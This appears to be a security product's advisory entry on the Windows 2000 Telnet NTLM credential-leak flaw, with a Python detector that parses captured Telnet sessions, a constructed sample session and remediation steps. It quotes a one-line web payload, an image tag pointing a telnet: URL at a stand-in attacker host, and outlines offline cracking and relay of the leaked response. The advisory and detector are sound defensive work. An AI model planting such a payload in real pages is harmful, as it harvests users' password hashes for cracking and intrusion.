Telnet NTLM tickle
Summary
Your Windows logon information (your username and an NTLM challenge-response derived from your password hash) has been transmitted to a server in a suspicious fashion.
Details
Your username, domain and an NTLM challenge-response computed from your password hash have been forwarded to the intruder's server. This is extremely dangerous for two reasons. Because the intruder chose the challenge, the response can be attacked offline to recover your password hash and, from it, your password. The intruder may also be able to relay the captured credentials back to your machine, or to another server that trusts them, in order to break in.
This is an extremely important matter that you should investigate further. The intruder may be able to use this information not only to break into the machine it came from, but also into any other system that shares the same username and password.
More Details
A bug was found in the initial release of Windows 2000. A hostile web page can contain an image reference (or a link) that looks something like:
<IMG SRC="telnet://intruder.example.com">
Because the browser hands the telnet: URL to the Telnet client without asking, this forces the client to connect to the hostile server automatically. The intruder runs a program on that server that accepts the Telnet connection and then asks the client to authenticate using Microsoft NTLM. The Windows 2000 Telnet client honours that request without prompting, so it sends the logged-on username and domain together with an NTLM response computed from the password hash against a challenge the intruder picked.
In the next phase of the attack, the intruder attempts to crack that challenge-response offline in order to recover the password hash and the original password.
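The exchange described above, as an added example that is not part of the original FAQ and not BlackICE's detection code: a small Python detector that parses the Telnet AUTHENTICATION option negotiation (RFC 2941) from a captured session and raises the "tickle" finding when the server asks for NTLM and the client answers with NTLM, pulling the leaked domain, user and NT response out of the client's NTLMSSP Type 3 message. The Telnet command and option codes, the NTLM authentication-type number 15 and the Type 3 layout are taken from the RFCs and MS-NLMP; the NTLM sub-command byte (AUTH/CHALLENGE/RESPONSE), the framing of the NTLM blob inside the IS and REPLY data, and the sample session itself are assumptions made for this example, and a real capture should be checked against a protocol dissector before the parsing is trusted.

```python
import struct

# Telnet command and option codes (RFC 854 / RFC 2941).
IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254
OPT_AUTHENTICATION = 37
AUTH_IS, AUTH_SEND, AUTH_REPLY = 0, 1, 2
AUTHTYPE_NTLM = 15                                  # IANA Telnet authentication type for NTLM
NTLM_AUTH, NTLM_CHALLENGE, NTLM_RESPONSE = 0, 1, 2  # assumed NTLM sub-command numbering


def telnet_commands(data):
    """Yield ('DO'|'DONT'|'WILL'|'WONT', option) or ('SB', body) for each IAC
    sequence in one direction of a Telnet stream.  Ordinary data bytes are
    skipped, and a doubled IAC (IAC IAC) inside a subnegotiation is unescaped,
    which matters here because NTLM blobs routinely contain 0xFF bytes."""
    names = {DO: 'DO', DONT: 'DONT', WILL: 'WILL', WONT: 'WONT'}
    i, n = 0, len(data)
    while i < n:
        if data[i] != IAC or i + 1 >= n:
            i += 1
            continue
        cmd = data[i + 1]
        if cmd in names and i + 2 < n:
            yield names[cmd], data[i + 2]
            i += 3
        elif cmd == SB:
            body, j = bytearray(), i + 2
            while j < n:
                if data[j] == IAC and j + 1 < n and data[j + 1] == SE:
                    j += 2
                    break
                if data[j] == IAC and j + 1 < n and data[j + 1] == IAC:
                    j += 1                          # keep one of the doubled IACs
                body.append(data[j])
                j += 1
            yield 'SB', bytes(body)
            i = j
        else:
            i += 2                                  # escaped data byte or 2-byte command


def parse_ntlm_type3(msg):
    """Extract domain, user, workstation and the NT response from an NTLMSSP
    Type 3 (AUTHENTICATE_MESSAGE in MS-NLMP): 8-byte signature, 4-byte type,
    then (len, maxlen, offset) buffers for the LM response, NT response,
    domain, user and workstation, and the negotiate flags at offset 60."""
    if len(msg) < 64 or msg[:8] != b'NTLMSSP\x00' or struct.unpack_from('<I', msg, 8)[0] != 3:
        return None

    def field(idx):
        ln, _maxlen, off = struct.unpack_from('<HHI', msg, 12 + 8 * idx)
        return msg[off:off + ln]

    flags = struct.unpack_from('<I', msg, 60)[0]
    enc = 'utf-16-le' if flags & 0x1 else 'ascii'     # NTLMSSP_NEGOTIATE_UNICODE
    return {'domain': field(2).decode(enc), 'user': field(3).decode(enc),
            'workstation': field(4).decode(enc), 'nt_response': field(1)}


def detect_ntlm_tickle(server_to_client, client_to_server):
    """The signature: the server SENDs NTLM as an acceptable authentication
    type and the client answers IS NTLM.  Returns None when the server never
    asked for NTLM, otherwise a finding holding whatever the client leaked."""
    asked = any(kind == 'SB' and len(body) >= 4 and body[0] == OPT_AUTHENTICATION
                and body[1] == AUTH_SEND and AUTHTYPE_NTLM in body[2::2]
                for kind, body in telnet_commands(server_to_client))
    if not asked:
        return None
    finding = {'ntlm_offered': False, 'domain': None, 'user': None,
               'workstation': None, 'nt_response': None}
    for kind, body in telnet_commands(client_to_server):
        if (kind != 'SB' or len(body) < 5 or body[0] != OPT_AUTHENTICATION
                or body[1] != AUTH_IS or body[2] != AUTHTYPE_NTLM):
            continue
        finding['ntlm_offered'] = True
        if body[4] == NTLM_RESPONSE:                # the Type 3 carries the identity
            finding.update(parse_ntlm_type3(body[5:]) or {})
    return finding


# --- Constructed sample session (an assumption for this example, not a real capture) ---
def _sb(body):
    """Frame a subnegotiation, doubling any IAC bytes in the body."""
    return bytes([IAC, SB]) + body.replace(b'\xff', b'\xff\xff') + bytes([IAC, SE])


def build_type3(domain, user, workstation, nt_response):
    """Build a minimal Unicode NTLMSSP Type 3 message for the sample client."""
    bufs = [b'', nt_response, domain.encode('utf-16-le'),
            user.encode('utf-16-le'), workstation.encode('utf-16-le'), b'']
    hdr, off, payload = b'NTLMSSP\x00' + struct.pack('<I', 3), 64, b''
    for b in bufs:
        hdr += struct.pack('<HHI', len(b), len(b), off)
        off, payload = off + len(b), payload + b
    return hdr + struct.pack('<I', 0x00000201) + payload   # NEGOTIATE_NTLM | UNICODE


SAMPLE_NT_RESPONSE = bytes(range(232, 256))        # 24 bytes, deliberately includes 0xFF
SAMPLE_SERVER = (bytes([IAC, DO, OPT_AUTHENTICATION])
                 + _sb(bytes([OPT_AUTHENTICATION, AUTH_SEND, AUTHTYPE_NTLM, 0]))
                 + _sb(bytes([OPT_AUTHENTICATION, AUTH_REPLY, AUTHTYPE_NTLM, 0,
                              NTLM_CHALLENGE]) + b'\xff' * 8))   # attacker-chosen challenge
SAMPLE_CLIENT = (bytes([IAC, WILL, OPT_AUTHENTICATION])
                 + _sb(bytes([OPT_AUTHENTICATION, AUTH_IS, AUTHTYPE_NTLM, 0, NTLM_AUTH])
                       + b'NTLMSSP\x00\x01\x00\x00\x00')
                 + _sb(bytes([OPT_AUTHENTICATION, AUTH_IS, AUTHTYPE_NTLM, 0, NTLM_RESPONSE])
                       + build_type3('CORP', 'alice', 'WS01', SAMPLE_NT_RESPONSE)))

if __name__ == '__main__':
    print(detect_ntlm_tickle(SAMPLE_SERVER, SAMPLE_CLIENT))
```

The detector is the mirror image of the intruder's server: the same negotiation, parsed instead of produced. Note that it needs both directions of the session, because a client IS NTLM on its own also appears in a legitimate login to a Windows 2000 Telnet Server; what makes the exchange a "tickle" is that the NTLM request came from a host the user never chose to log in to.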
Defense
Most importantly, change your password immediately and log off from, or close, any existing connections to servers. Neither of the measures below recovers credentials that have already been captured, which is why the password change comes first.
To prevent this from happening in the future, install the patch from Microsoft (see below) or disable automatic NTLM authentication in the Telnet client. To do the latter, run "telnet" from the command prompt with no arguments, enter the command "unset ntlm" at the telnet prompt to turn this feature off, then exit the program; the setting is saved in the registry. Be aware that with NTLM turned off the client falls back to a plaintext login, so any username and password you type are sent in the clear to whatever host you connect to; the patch is the better fix.
More information
Version appeared: 2.5